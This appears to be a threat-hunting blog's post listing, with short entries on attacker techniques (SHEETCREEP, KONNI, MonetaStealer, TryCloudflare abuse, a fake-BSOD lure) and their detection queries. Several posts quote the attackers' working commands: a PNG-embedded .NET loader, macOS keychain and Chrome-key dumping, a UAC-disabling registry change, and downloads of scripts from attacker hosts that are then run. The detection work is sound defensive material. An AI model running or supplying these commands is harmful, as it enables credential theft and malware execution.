Posts

371. Adversaries Disguise Malicious Files as PNG Images

Hello everyone! Today we’ll look at another interesting example of implementing one of my favorite techniques for proactive hunting - Command and Scripting Interpreter: PowerShell (T1059.001). This example is related to the distribution of the SHEETCREEP backdoor. The attackers distributed ZIP archives that contained two files: an LNK and a PNG. Opening the LNK file executed the following command:

powershell.exe -WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes('details.png');([System.Reflection.Assembly]::Load([byte[]]($b[($b.Length-1)..0])).GetType(\"Task10.Program\")::MB())"

The command reads bytes from the PNG file, reverses them, and loads them as a .NET assembly. What can we hunt for? For example, reading bytes with PowerShell from suspicious files, in particular PNG files (of course, you can extend this list):

event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: (*ReadAllBytes* AND *png*)

See yo...

370. Adversaries Disable UAC Prompts for Administrator Accounts

Hello everyone! Today we’re going to look at another interesting example of the Modify Registry (T1112) technique, this time in the context of the Defense Evasion tactic. So, today’s example comes from an activity cluster known as KONNI. The malware used by the attacker modified the following registry parameter:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin

This parameter defines how Windows requests confirmation for privilege elevation for administrators. Of course, the attackers change its value to “0”, which allows privilege elevation to occur without any confirmation. Therefore, it may be a good idea to look for suspicious events related to modification of this parameter:

event_type: "registryvaluesetwin" AND reg_key_path: "consentpromptbehavioradmin" AND reg_value_data: "0x00000000"

By the way, the report we’re discussing is yet another example of how attackers are abusing AI to develop malware and tools! ...

369. Here's How MonetaStealer Abuses macOS "Security"

Hello everyone! It’s been a while since we last talked about macOS, so it’s high time to fix that. Today, we’ll look at an example of implementing the technique Credentials from Password Stores: Keychain (T1555.001). As before, our focus is on real-world threats, and as an example we’ll examine MonetaStealer. This malware actively abuses the built-in macOS security utility, which is designed to work with the macOS security system - primarily the Keychain, certificates, passwords, and access control policies. For example, the stealer abuses this utility to obtain the key used to decrypt passwords saved in Google Chrome:

security find-generic-password -w -a "Chrome"

The utility is also used to extract data from the Keychain and search for specific keywords:

security dump-keychain 2>/dev/null | grep -i {keyword} | head -20

Both examples can be good targets for hunting (or even detection):

event_type: "processcreatemac" AND proc_file_path: "security" AND...

368. Hunting for TryCloudflare Abuse

Hello everyone! As you know, attackers often abuse various legitimate web services - for example, to exfiltrate data or to download tools. Today we’ll look at another such service, TryCloudflare, and examine how attackers use it in the context of the Ingress Tool Transfer (T1105) technique. So, TryCloudflare makes it possible to expose a local service to the Internet, with access provided via a Cloudflare-generated domain, for example:

plus-condos-thy-redeem.trycloudflare[.]com

Let’s look at a recent example demonstrating abuse of this service. First, the attackers initiate a connection to the server:

rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie plus-condos-thy-redeem.trycloudflare[.]com@SSL https://plus-condos-thy-redeem.trycloudflare[.]com/

Second, they download malicious scripts:

"C:\WINDOWS\System32\WScript.exe" "\\plus-condos-thy-redeem.trycloudflare[.]com@SSL\DavWWWRoot\as.wsh"

powershell -Command "iwr 'https://plus-condos-thy-redeem.tr...

367. Adversaries Use Fake BSOD to Make a Victim Run a Malicious Command

Hello everyone! Why are phishing emails needed if victims can run a malicious command themselves? Yes, today we’re once again looking at an interesting variant of User Execution: Malicious Copy and Paste (T1204.004). In fact, phishing emails were still involved: this time the attackers disguised themselves as Booking.com. The email contained a link leading to a phishing website. When the victim clicked the “Refresh page” button, the browser switched to full-screen mode and displayed a familiar instruction to copy and paste a malicious command - this time cleverly disguised as a Blue Screen of Death. As for the command itself, it was also quite interesting and included the use of Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001):

powershell -c “start hxxps[://admin.booking[.]com;$msb=(gci C:\ -filter msbuild.exe -r -ea 0|select -f 1).FullName;iwr hxxps://2fa-bns[.]com/ -o $env:ProgramData\v.proj;& $msb $env:ProgramData\v.proj”

Detection: Pay attention to file...

366. Adversaries Started to Abuse Controlio

Hello everyone! I promised to keep posting and to notify you of any interesting tactics, techniques and procedures. So, let's start the new year! Harlan Carvey (I'm sure you've read his books!) shared that adversaries have started to use Controlio - a cloud-based employee monitoring and productivity analytics platform. By the way, it's not the first time adversaries have used similar tools. Another example is Rare Werewolf: the adversary leveraged Mipko Employee Monitor.

Look for suspicious communications with controlio[.]net:

event_type: "dnsreqwin" AND dns_rname: "controlio.net"

Look for suspicious executions of Controlio-related binaries:

event_type: "processcreatewin" AND proc_file_productname: "controlio"

Happy hunting!

365. The Zeltser Challenge Completed

Hello everyone! No, no more detection and hunting tips today! And yes, it's the last post for the Zeltser challenge! It was definitely a hard one, but still it was fun! Thank you, Dave, for motivating me to start it! Thanks to everyone who reacted to the posts and wrote kind words - it helped me a lot to finish it! It doesn't mean I'll stop posting! But I won't do it every day! Still, if I see something interesting, I'll share it with you! Thank you for reading the blog, and see you next year!